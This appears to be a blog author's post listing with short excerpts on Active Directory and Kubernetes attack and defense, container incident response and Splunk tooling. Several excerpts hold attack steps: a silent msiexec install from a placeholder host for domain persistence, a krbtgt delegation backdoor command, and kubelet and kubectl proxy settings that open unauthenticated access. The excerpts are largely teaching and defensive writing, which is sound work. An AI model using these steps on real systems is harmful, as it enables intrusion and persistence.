- 博客(639)
- 资源 (3)
- 收藏
- 关注
原创 AD域安全攻防实践(附攻防矩阵图)
以域控为基础架构,通过域控实现对用户和计算机资源的统一管理,带来便利的同时也成为了最受攻击者重点攻击的集权系统。01、攻击篇针对域控的攻击技术,在Windows通用攻击技术的基础上自成一套技术体系,将AD域攻防分为信息收集、权限提升、凭证窃取、横向移动、权限维持等攻击阶段,把域环境下众多且繁杂的攻击行为映射到ATT&CK,梳理成一个AD域攻防矩阵图。(1)域内信息收集当攻击者获得内网某台域...
2023-03-11 18:01:16 3134 1
原创 《云原生安全攻防》-- 容器安全风险分析
在本节课程中,我们将提供一个全面的视角,来深入探讨容器环境下的安全风险,帮忙大家建立起容器环境下安全风险的整体认知。在这个课程中,我们将学习以下内容:容器技术概述:什么是容器技术以及它解决了什么问题。探索容器架构:深入了解容器、镜像、镜像仓库等核心概念。安全风险分析:逐层分析容器架构,识别各层面可能存在的安全风险。容器将集装箱思想引入到软件交付中,通过这种方式,来解决本地运行环境与生产运行环境不一...
2024-02-02 21:24:51 489
原创 《云原生安全攻防》-- 云原生安全概述
从本节课程开始,我们将正式踏上云原生安全的学习之旅。在深入探讨云原生安全的相关概念之前,让我们先对云原生有一个全面的认识。什么是云原生呢?云原生(Cloud Native)是一个组合词,我们把它拆分为云和原生两个词来看。“云”表示应用程序运行于分布式云环境中,而“原生”则强调应用程序在设计之初就充分考虑到了云平台的弹性和分布式特性。随着云原生技术的飞速前进,容器化和微服务架构已成为现代应用开发的标...
2024-01-31 21:36:25 923
原创 《云原生安全攻防》-- 课程大纲
我决定整合以往的专业积累,构建一个完整的云原生安全知识体系,以视频的方式提供更专业的技术内容,为此花费了不少时间思考技术体系和筹备细节上,希望它可以成为我24年的代表作品吧。
2024-01-27 20:15:30 218
原创 K8s攻击案例:Dashboard未授权访问
Dashboard 在配置不当情况下有可能会产生未授权访问的情况,从而有可能进一步造成接管集群。(1)攻击场景在deployment中开启enable-skip-login,那么就可以在登录界面点击跳过登录进dashboard。将默认的Kubernetes-dashboard绑定cluster-admin,拥有管理集群管权限kubectl create clusterrolebind...
2024-01-02 09:18:00 442
原创 K8s攻击案例:kube-proxy不安全配置
通过使用kube-proxy暴露未授权访问的服务或组件,可能会形成外部攻击入口点,从而导致集群被入侵。(1)攻击场景使用kubectl proxy命令设置API server接收所有主机的请求。kubectl --insecure-skip-tls-verify proxy --accept-hosts=^.*$ --address=0.0.0.0 --port=8009(2)攻击...
2024-01-02 09:16:00 383
原创 K8s攻击案例:etcd 未授权访问
etcd 用于存储K8s集群中的所有配置数据和状态信息,如果管理员配置不当,导致etcd未授权访问的情况,那么攻击者就可以从etcd中获取secrets&token等关键信息,进而通过kubectl创建恶意pod从而接管集群。(1)攻击场景将client-cert-auth=true 改为false,把listen-client-urls监听修改为0.0.0.0,将端口被暴露出去,导...
2024-01-02 09:14:00 403
原创 K8s攻击案例:kubelet未授权访问
kubelet会在集群中每个节点运行,对容器进行生命周期的管理,如果kubelet配置不当,攻击者可创建恶意Pod尝试逃逸到宿主机。(1)攻击场景anonymous默认为false,修改为true,并将mode从Webhook修改为AlwaysAllow。vi /var/lib/kubelet/config.yamlanonymous: enabled: trueauthor...
2024-01-02 09:11:00 419
原创 K8s攻击案例: API Server未授权访问
API Server 是集群的管理入口,任何资源请求或调用都是通过kube-apiserver提供的接口进行。默认情况下,API Server提供两个端口服务,8080和6443,配置不当将出现未授权访问。8080端口,默认不启动,无需认证和授权检查,一旦暴露将导致未授权访问。6443端口,默认启动需要认证,如果出现配置错误,将system:anonymous用户绑定到cluster-adm...
2024-01-02 09:07:00 438
原创 K8s攻击案例:组件未授权访问导致集群入侵
K8s集群往往会因为组件的不安全配置存在未授权访问的情况,如果攻击者能够进行未授权访问,可能导致集群节点遭受入侵。比较常见的的组件未授权访问漏洞,主要包括 API Server 未授权访问、kubelet 未授权访问、etcd 未授权访问、kube-proxy 不安全配置、Dashboard未授权访问。接下来,我们将对这几个未授权访问的攻击场景和攻击过程进行详细的分析。01、 API Server...
2023-12-25 11:09:15 7720
原创 K8s攻击案例:Privileged特权容器导致节点沦陷
01、概述特权容器(Privileged Container)是一种比较特殊的容器,在K8s中运行特权容器,需要将Privileged 设为 true ,容器可以执行几乎所有可以直接在主机上执行的操作。基于此,利用容器的特权配置可以获取容器所在节点的权限,甚至从节点权限提升至集群管理员权限。02、攻击场景编写yaml文件,在securityContext中加入参数,将privileged设置为t...
2023-12-19 21:10:54 7114
原创 K8s攻击案例:RBAC配置不当导致集群接管
01、概述Service Account本质是服务账号,是Pod连接K8s集群的凭证。在默认情况下,系统会为创建的Pod提供一个默认的Service Account,用户也可以自定义Service Account,与Service Account关联的凭证会自动挂载到Pod的文件系统中。当攻击者通过某个web应用获取到一个Pod权限时,如果RBAC权限配置不当,Pod关联的Service Acco...
2023-12-18 19:12:25 6752
原创 镜像安全扫描工具
镜像安全扫描是确保云原生环境安全非常重要和基础的一个环节,通过镜像安全扫描可以检测容器镜像中的漏洞,避免攻击者植入恶意代码,快速响应漏洞,从而降低安全风险。本文分享两个比较常用的镜像安全扫描工具,它们可以帮助我们识别容器镜像中的漏洞和弱点。1、TrivyTrivy是一个全面的多功能安全扫描器,支持在容器镜像、Kubernetes、代码存储库、AWS中查找漏洞、错误配置、敏感信息和密钥、SBOM等。...
2023-11-07 08:03:09 232
原创 Docker 恶意挖矿镜像应急实例
01、概述当网络流量监控发现某台运行多个docker容器的主机主动连接到一个疑似挖矿矿池的地址时,需要快速响应和排查,以阻止进一步的损害。面对docker容器的场景下,如何快速分析和识别恶意挖矿容器?本文将分享一种应急响应思路,用于排查运行多个Docker容器的主机中可能存在的恶意挖矿容器。02、定位容器在宿主机上通过netstat -an 是看不到容器内的网络连接的,而一台台进入容器查看网络连接...
2023-09-14 20:25:19 6722
原创 如何从Docker镜像中提取恶意文件
当发生容器安全事件时,需要从容器或镜像中提取恶意文件进行分析和处理。本文主要介绍3种常见的方法:(1) 从运行的容器中复制文件首先,需要从镜像运行启动一个容器,然后,使用docker cp命令从容器中提取文件到宿主机。docker run -d --name test test:v1.0 //运行容器docker cp test:/tmp/evil.sh /tmp/eill.shdocker...
2023-09-12 08:00:41 244
原创 Docker镜像解析获取Dockerfile文件
01、概述当涉及到容器镜像的安全时,特别是在出现镜像投毒引发的安全事件时,追溯镜像的来源和解析Dockerfile文件是应急事件处理的关键步骤。在这篇博客中,我们将探讨如何从镜像解析获取Dockerfile文件,这对容器安全至关重要。02、环境准备利用Dockfile构建一个反弹shell的恶意镜像:FROM ubuntu:20.04RUN apt-get update &&\...
2023-09-07 20:16:09 668
原创 Ubuntu 20.04 LTS 安装Kubernetes 1.26
1、环境配置(1)添加主机名称解析记录cat > /etc/hosts << EOF192.168.44.200 master01 master01.bypass.cn192.168.44.201 node01 node01.bypass.cn192.168.44.202 node02 node02.bypass.cnEOF(2)禁止K8s使用虚...
2023-09-02 21:54:00 582
原创 Docker容器挖矿应急实例
01、概述很多开源组件封装成容器镜像进行容器化部署在提高应用部署效率和管理便捷性的同时,也带来了一些安全挑战。一旦开源系统出现安全漏洞,基于资产测绘就很容易关联到开源组件,可能导致被批量利用。在本文中,我们将分享一个真实的Docker容器应急实例,涉及到基于开源组件漏洞披露的前后时间段内,容器遭遇挖矿程序植入的情况。我们将深入分析排查过程,还原入侵的步骤和手段,帮助读者了解应对挖矿程序入侵的实际应...
2023-08-07 08:02:28 347
原创 K8s安全配置:CIS基准与kube-bench工具
01、概述K8s集群往往会因为配置不当导致存在入侵风险,如K8S组件的未授权访问、容器逃逸和横向攻击等。为了保护K8s集群的安全,我们必须仔细检查安全配置。CIS Kubernetes基准提供了集群安全配置的最佳实践,主要聚焦在两个方面:主节点安全配置和工作节点安全配置。主节点安全配置涵盖了控制平面节点配置文件、APIServer、Controller Manager、Scheduler、etcd...
2023-07-30 16:28:55 1240
原创 AD域安全之旅(微课程)
通过借助ChatGPT优化内容和文案,将我的声音训练成AI模型,实现将文本转换成声音,再结合PPT和剪辑技巧,就可以轻松制作出简单的微课程。
2023-07-24 19:35:56 176
原创 如何快速判断是否在容器环境
在渗透测试过程中,我们的起始攻击点可能在一台虚拟机里或是一个Docker环境里,甚至可能是在K8s集群环境的一个pod里,我们应该如何快速判断当前是否在容器环境中运行呢?当拿到shell权限,看到数字和字母随机生成的主机名大概率猜到在容器里了,查看进程,进程数很少,PID为1的进程为业务进程,这也是容器环境的典型特征。当然,以上这两种都是比较主观的判断。接下来,我们再来盘点下比较常用的几种检测...
2023-06-30 16:48:00 2254
原创 容器环境检测方法总结
在渗透测试过程中,我们的起始攻击点可能在一台虚拟机里或是一个Docker环境里,甚至可能是在K8s集群环境的一个pod里,我们应该如何快速判断当前是否在容器环境中运行呢?当拿到shell权限,看到数字和字母随机生成的主机名大概率猜到在容器里了,查看进程,进程数很少,PID为1的进程为业务进程,这也是容器环境的典型特征。当然,以上这两种都是比较主观的判断。接下来,我们再来盘点下比较常用的几种检测方式...
2023-06-29 08:00:13 575
原创 kubectl get cs显示unhealthy的解决办法
01、问题描述使用kubectl get cs查看K8s组件状态,发现scheduler和controller-manager状态为Unhealthy,但集群可以正常使用。[root@k8s-master ~]# kubectl get csWarning: v1 ComponentStatus is deprecated in v1.19+NAME S...
2023-06-19 18:21:00 675
原创 Docker 容器入侵排查
随着越来越多的应用程序运行在容器里,各种容器安全事件也随之发生,例如攻击者可以通过容器应用获取容器控制权,利用失陷容器进行内网横向,并进一步逃逸到宿主机甚至攻击K8s集群。容器的运行环境是相对独立而纯粹,当容器遭受攻击时,急需对可疑的容器进行入侵排查以确认是否已失陷,并进一步进行应急处理和溯源分析找到攻击来源。在应急场景下,使用docker命令可以最大程度利用docker自身的特性,快速的获取相关...
2023-06-14 20:20:16 2035 1
原创 Habor 搭建镜像仓库
01、环境准备(1)安装docker和docker-compose(2)下载harbor离线安装包 下载地址:https://github.com/goharbor/harbor/releases02、安装harbor(1)修改配置cp harbor.yml.tmpl harbor.yml#按需要修改配置文件(2)运行脚本./prepare./install....
2023-06-14 09:45:00 189
原创 Splunk通过企业微信实现微信告警
1、准备条件: 注册企业微信--创建应用,获取相关的corpId 和secret等信息。2、编写python脚本,使用Python实现企业微信通知功能,可自定义告警信息。代码demo:#!/usr/bin/python# -*- coding: utf-8 -*-import sys,gzip,csv,jsonimport requestsimport timeimpo...
2023-06-14 09:42:00 243
原创 巧用OpenSSH进行域内权限维持
最近在Windows服务器上安装OpenSSH,意外发现了一个很有意思的技巧,可用来做域内权限维持,废话不多说,直接上步骤。01、利用方式(1)在已经获得权限的Windows服务器上,使用msiexec安装openssh,一行命令静默安装,不需要任何设置。msiexec /i "http://x.x.x.x/OpenSSH-Win64.msi"(2)在默认安装的情况下,配置文件:C:\Progra...
2023-05-23 08:02:01 173
原创 Splunk DB Connect 连接SQL Server报错
01、问题描述使用Splunk DB Connect 连接SQL Server数据库读取数据时,报错信息如下:驱动程序无法使用安全套接字层(SSL)加密建立与SQL Server的安全连接。The driver could not establish a secure connection to SQL Server by using Secure Sockets Layer (SSL) ...
2023-04-24 13:20:00 608
原创 一个AK/SK泄露检测的实现思路
01、简介在企业上云的过程中,AK/SK泄露导致的数据泄露事件屡见不鲜。在企业混合云架构下,公有云和私有云都存在大量的AccessKey,如何有效地检测可能的AK/SK泄露事件,一直困扰着企业的安全人员。本文提供了一种比较容易实现的思路,完成AK/SK泄露检测能力的构建,实现类似于阿里云云安全中心AK泄露检测的功能,检测GitHub平台公开源代码中是否包含企业所使用的AK/SK敏感信息。02、实现...
2023-04-21 08:00:33 1564
原创 云原生安全工具合集
以Docker+K8s为代表的容器技术得到了越来越广泛的应用,从安全攻防的角度,攻击者已经不再满足于容器逃逸,进而攻击整个容器编排平台,如果可以拿下集群管理员权限,其效果不亚于域控失陷。在云原生安全攻防的场景下,甲乙攻防双方对于安全工具的关注点也不一样。本文试图收集一些开源的云原生安全工具,带你一起去了解云原生安全。1、云原生攻防靶场Metarget 是一个脆弱基础设施自动化构建框架,主要用于快速...
2023-04-10 20:13:08 270
原创 Splunk DB Connect 连接MySQL报错CLIENT_PLUGIN_AUTH is required
01、问题描述使用Splunk DB Connect 连接MySQL数据库读库时,报错CLIENT_PLUGIN_AUTH is required,如下图:02、原因分析根据报错信息,查阅相关资料,了解到报错原因:目标数据库为MySQL 5.7,使用的mysql-connector-java-8.0.28.jar,mysql的jar包版本过高。JDBC数据库驱动程序:mysql-con...
2023-03-17 13:44:00 1097
原创 splunk 自定义SPL命令关联威胁情报数据
通过自定义SPL命令关联微步情报数据,效果如下:1、安装splunk-sdkcd /data/splunk/etc/apps/search/binpip3 install -t . splunk-sdk2、自定义脚本开发[root@SIEM-P-VC-A001 bin]# more threatquery.py #!/usr/bin/python# -*- coding: ...
2023-03-17 13:07:00 286
原创 K8s集群部署(二进制安装部署详细手册)
一、简介K8s部署主要有两种方式:1、Kubeadm Kubeadm是一个K8s部署工具,提供kubeadm init和kubeadm join,用于快速部署Kubernetes集群。2、二进制 从github下载发行版的二进制包,手动部署每个组件,组成Kubernetes集群。本文通过二进制安装部署的方式在centos7上搭建kubernetes集群...
2023-02-17 19:18:00 1660 1
原创 K8s集群部署(kubeadm安装部署详细手册)
1、简介K8s部署主要有两种方式:1、Kubeadm Kubeadm是一个K8s部署工具,提供kubeadm init和kubeadm join,用于快速部署Kubernetes集群。2、二进制 从github下载发行版的二进制包,手动部署每个组件,组成Kubernetes集群。本文通过kudeadm的方式在centos7上安装kubernetes集群。...
2023-02-17 19:16:00 538
原创 基于AD Event日志监测域委派后门
01、简介域委派是指将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动。攻击者在获取到域控权限后,可以利用约束委派或者基于资源的约束委派实现后门,以实现达到维持权限的目的。基于AD Event日志监视对特定 Active Directory 属性的修改,从而发现可疑的域委派后门。02、约束委派攻击场景假设服务账号配置了到域控的约束性委派,当攻击者控制了服务账号,就可以伪造任意用户...
2023-02-06 20:00:19 286
原创 基于AD Event日志监测约束委派攻击
01、简介 假设服务账号配置了到域控的约束性委派,当攻击者获取了服务账号,可以作为变种黄金票据,用作后门权限维持。 基于AD Event日志监测msDS-AllowedToDelegateTo属性的修改,从而发现可疑的约束委派攻击。02、利用方式(1)通过powershell添加test用户到krbtgt的约束委派Import-Module ActiveDirectory$user...
2023-02-06 14:37:00 215
原创 基于AD Event日志监测基于资源的约束委派攻击
01、简介 攻击者在获取到域控权限后,可以利用基于资源的约束委派实现后门,通过对krbtgt用户设置委派属性,以实现达到维持权限的目的。基于AD Event日志监测msDS-AllowedToActOnBehalfOfOtherIdentity属性的修改,从而发现可疑的基于资源的约束委派攻击。02、利用方式(1)设置属性值并查询Set-ADUser krbtgt -Principal...
2023-02-03 18:50:00 190
原创 域内委派攻击
域委派是指,将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动。利用委派可获取域管理员权限域委派主要分为三种:非约束性委派约束性委派基于资源的约束性委派在Windows系统中,只有服务账号和主机账号的属性才有委派功能,普通用户默认是没有的。01、非约束委派攻击设置非约束委派主机账号设置非约束委派:活动目录中的computers组内的计算机,双...
2023-01-31 19:28:00 402
原创 Centos8 重启后,同网段可以访问,其他网段访问不了,怎么解决?
现象描述:某应用系统,服务器IP地址:10.224.252.34 ,重启服务器后,同网段10.224.252.0/24 可以正常访问到服务,其他192.168.0.0 网段都无法访问到服务。登录排查:登录服务器查看路由表信息,eth3对应10.224.252.0/24,eth2对应192.0.0.0/8,初步怀疑服务器重启后,eth2 网卡未能正常启动。处理方案:重启网卡eth2后,恢复...
2023-01-30 18:12:00 590
原创 CISSP 考试知识要点总结
第一章:安全与风险管理1.1 安全基本原则(CIA) 机密性(Confidentiality)加密静止数据(整个磁盘、数据库加密)加密传输(IPSec、SSL、PPTP、SSH)中的数据访问控制(物理和技术的) 完整性(Integrity)散列(数据完整性)配置管理(系统完整性)变更控制(进程完整性)访问控制(物理和技术的)软件数字签名传输循环冗余校...
2023-01-29 11:04:00 937
AD域内委派后门详解-1
2023-06-19
三步轻松理解Kerberos协议
2023-06-19
应急响应实战笔记_2020最新版.pdf
2020-06-24
WAF攻防实战笔记v1.0--Bypass.pdf
2020-03-30
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人